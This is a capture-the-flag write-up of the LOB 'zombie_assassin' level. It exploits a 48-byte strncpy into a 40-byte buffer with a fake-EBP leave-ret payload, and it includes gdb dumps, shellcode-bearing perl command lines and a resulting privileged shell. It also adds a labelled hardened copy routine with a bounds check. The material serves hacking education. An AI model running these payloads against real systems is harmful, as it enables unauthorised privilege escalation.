Zombie Assassin!
Looking at the source, just like the previous level, the stack and library regions can't be used.
On top of that, strncpy is used instead of strcpy, so nothing past RET can be overwritten.
Hmm. If we can't write past RET, what comes to mind is Fake EBP.
And the comment even says FEBP;;
So let's not overthink it and solve this with Fake EBP.
Putting the payload together: there is no code that zeroes the stack, so I'll just put the shellcode on the stack itself.
The payload is laid out like this:
[shellcode address][shellcode][nop x20][address of the slot holding the shellcode address, minus 4 (fake EBP)][leave-ret gadget]
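What makes this frame attackable is visible in the disassembly below: a 40-byte buffer at `ebp-40`, but `strncpy` is called with a length of 48 (`push 48`), so the last 8 bytes land on the saved EBP and the return address. As an added example (not code from the LOB challenge or from the original post), here is that pattern next to a hardened copy whose bound comes from the destination buffer; `safe_copy` and `copy_stays_in_bounds` are names chosen for this illustration.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 40   /* char buffer[40] at ebp-40 in the disassembly */
#define COPY_LEN 48   /* the 'push 48' passed to strncpy */

/* The defective pattern, shown for contrast only (never called here):
   the length is a constant that does not match the destination, so the
   8 surplus bytes overwrite saved EBP and RET. strncpy also leaves the
   buffer unterminated when the input is 48 bytes or longer. */
void vulnerable_copy(char *dst, const char *src)
{
    strncpy(dst, src, COPY_LEN);   /* BUG: COPY_LEN > BUF_SIZE */
}

/* Hardened version: the bound is derived from the destination size, the
   result is always NUL-terminated, and the caller is told about truncation.
   Returns 0 on a full copy, 1 if the input was truncated, -1 on bad args. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    /* Measure the input, but never look further than the room we have. */
    for (n = 0; n < dst_size && src[n] != '\0'; n++)
        ;

    if (n == dst_size) {                 /* input fills or exceeds the buffer */
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);             /* n bytes plus the terminator */
    return 0;
}

/* Check helper: copy `src` into a 40-byte buffer followed by 8 canary bytes
   standing in for saved EBP and RET. Returns 1 if the canaries are untouched
   and the buffer holds a NUL, 0 otherwise. */
int copy_stays_in_bounds(const char *src)
{
    char frame[BUF_SIZE + 8];
    size_t i;

    memset(frame, 'C', sizeof frame);
    safe_copy(frame, BUF_SIZE, src);

    for (i = BUF_SIZE; i < sizeof frame; i++)
        if (frame[i] != 'C')
            return 0;                    /* saved EBP / RET would be clobbered */

    return memchr(frame, '\0', BUF_SIZE) != NULL;
}
```

The point of the check helper is that the 8 bytes after the buffer are exactly the saved frame pointer and return address in the real program; a copy routine that can reach them is the entire precondition for the leave-ret trick used in this level.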
[assassin@localhost assassin]$ cp zombie_assassin zombie_assassim
[assassin@localhost assassin]$ gdb -q zombie_assassim
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %ebp,%esp
0x8048443 <main+3>: sub %esp,40
0x8048446 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push 0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add %esp,4
0x8048459 <main+25>: push 0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add %esp,4
0x8048463 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048466 <main+38>: add %eax,4
0x8048469 <main+41>: mov %edx,DWORD PTR [%eax]
0x804846b <main+43>: add %edx,47
0x804846e <main+46>: cmp BYTE PTR [%edx],0xbf
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push 0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add %esp,4
0x8048480 <main+64>: push 0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add %esp,4
0x804848a <main+74>: lea %esi,[%esi]
0x8048490 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x8048493 <main+83>: add %eax,4
0x8048496 <main+86>: mov %edx,DWORD PTR [%eax]
0x8048498 <main+88>: add %edx,47
0x804849b <main+91>: cmp BYTE PTR [%edx],0x40
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push 0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add %esp,4
0x80484ad <main+109>: push 0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add %esp,4
0x80484b7 <main+119>: push 48
0x80484b9 <main+121>: mov %eax,DWORD PTR [%ebp+12]
0x80484bc <main+124>: add %eax,4
0x80484bf <main+127>: mov %edx,DWORD PTR [%eax]
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea %eax,[%ebp-40]
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add %esp,12
0x80484ce <main+142>: lea %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push 0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add %esp,8
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0x80484e1 <main+161>: nop
0x80484e2 <main+162>: nop
0x80484e3 <main+163>: nop
0x80484e4 <main+164>: nop
0x80484e5 <main+165>: nop
0x80484e6 <main+166>: nop
0x80484e7 <main+167>: nop
0x80484e8 <main+168>: nop
0x80484e9 <main+169>: nop
0x80484ea <main+170>: nop
0x80484eb <main+171>: nop
0x80484ec <main+172>: nop
0x80484ed <main+173>: nop
0x80484ee <main+174>: nop
0x80484ef <main+175>: nop
End of assembler dump.
(gdb) b *main+151
Breakpoint 1 at 0x80484d7
(gdb) r `perl -e 'print "\x90"x48'`
Starting program: /home/assassin/zombie_assassim `perl -e 'print "\x90"x48'`
The leave-ret gadget is at 0x080484df.
[assassin@localhost assassin]$ gdb -q zombie_assassim
(gdb) set disassembly-flavor intel
(gdb) b *main+159
Breakpoint 1 at 0x80484df
(gdb) r aaaaa
Starting program: /home/assassin/zombie_assassim aaaaa
aaaaa
Breakpoint 1, 0x80484df in main ()
(gdb) x/x $esp
0xbffffad0: 0x61616161
So buf starts at 0xbffffad0.
The address is going to be off anyway, but let's try it first.
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xd4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xbc\xfa\xff\xbf","\xdf\x84\x04\x08"'`
喇?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맻?욀?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xd4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xbc\xfa\xff\xbf","\xdf\x84\x04\x08"'`
喇?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맻?욀?
Segmentation fault
Doesn't pop right away, huh. Let me dump a core and check.
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xc8\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc0\xfa\xff\xbf","\xdf\x84\x04\x08"'`
힐?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맿?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 힐?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맿?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0xc3504005
(gdb) info reg
eax 0x32 50
ecx 0x400 1024
edx 0x40106980 1074817408
ebx 0x401081ec 1074823660
esp 0xbffffac8 -1073743160
ebp 0xc3504005 -1018150907
esi 0x4000ae60 1073786464
edi 0xbffffb24 -1073743068
eip 0x90909090 -1869574000
eflags 0x10292 66194
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
cwd 0x0 0
swd 0x0 0
twd 0x0 0
fip 0x0 0
fcs 0x0 0
fopo 0x0 0
fos 0x0 0
(gdb) quit
[assassin@localhost assassin]$
[assassin@localhost assassin]$
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xcc\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc4\xfa\xff\xbf","\xdf\x84\x04\x08"'`
屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb) quit
[assassin@localhost assassin]$ rm core
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xcc\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc4\xfa\xff\xbf","\xdf\x84\x04\x08"'`
屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb)
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb)
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb) x/64x $esp-64
0xbffffa8c: 0x40066070 0x40106980 0x0804857e 0xbffffab0
0xbffffa9c: 0x401081ec 0xbffffad8 0x080484dc 0x0804857e
0xbffffaac: 0xbffffab0 0xbffffacc 0x0fbff9b8 0xc0315040
0xbffffabc: 0x8ae0b850 0xc3504005 0x90909090 0x90909090
0xbffffacc: 0x90909090 0x90909090 0x90909090 0xbffffac4
0xbffffadc: 0x080484df 0x00000002 0xbffffb24 0xbffffb30
0xbffffaec: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffffafc: 0x080483b1 0x08048440 0x00000002 0xbffffb24
0xbffffb0c: 0x080482e4 0x0804851c 0x4000ae60 0xbffffb1c
0xbffffb1c: 0x40013e90 0x00000002 0xbffffc16 0xbffffc28
0xbffffb2c: 0x00000000 0xbffffc59 0xbffffc6c 0xbffffc84
0xbffffb3c: 0xbffffca3 0xbffffcc5 0xbffffcd3 0xbffffe96
0xbffffb4c: 0xbffffeb5 0xbffffed3 0xbffffee8 0xbfffff08
0xbffffb5c: 0xbfffff13 0xbfffff24 0xbfffff2c 0xbfffff36
0xbffffb6c: 0xbfffff46 0xbfffff54 0xbfffff62 0xbfffff73
0xbffffb7c: 0xbfffff7e 0xbfffff92 0xbfffffd6 0x00000000
(gdb) quit
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault
[assassin@localhost assassin]$ rm core
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbffffad9 in ?? ()
(gdb) x/64x $esp-64
0xbffffa60: 0x40021df0 0x401088c0 0x4002982c 0x40021df0
0xbffffa70: 0xbffffaa0 0x4000a970 0xbffffc58 0xbffffadf
0xbffffa80: 0x4005d920 0x400143e0 0xbffffaa0 0x40066070
0xbffffa90: 0x40106980 0x0804857e 0xbffffab0 0x401081ec
0xbffffaa0: 0x00000292 0x080484dc 0x0804857e 0xbffffab0
0xbffffab0: 0xbffffaa4 0x0fbff9b8 0xc0315040 0x8ae0b850
0xbffffac0: 0xc3504005 0x90909090 0x90909090 0x90909090
0xbffffad0: 0x90909090 0x90909090 0xbffffa9c 0x080484df
0xbffffae0: 0x00000002 0xbffffb24 0xbffffb30 0x40013868
0xbffffaf0: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffb00: 0x08048440 0x00000002 0xbffffb24 0x080482e4
0xbffffb10: 0x0804851c 0x4000ae60 0xbffffb1c 0x40013e90
0xbffffb20: 0x00000002 0xbffffc16 0xbffffc28 0x00000000
0xbffffb30: 0xbffffc59 0xbffffc6c 0xbffffc84 0xbffffca3
0xbffffb40: 0xbffffcc5 0xbffffcd3 0xbffffe96 0xbffffeb5
0xbffffb50: 0xbffffed3 0xbffffee8 0xbfffff08 0xbfffff13
(gdb) quit
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xb4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xac\xfa\xff\xbf","\xdf\x84\x04\x08"'`
덜?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맟?욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
The address kept shifting around, so this one gave me some grief.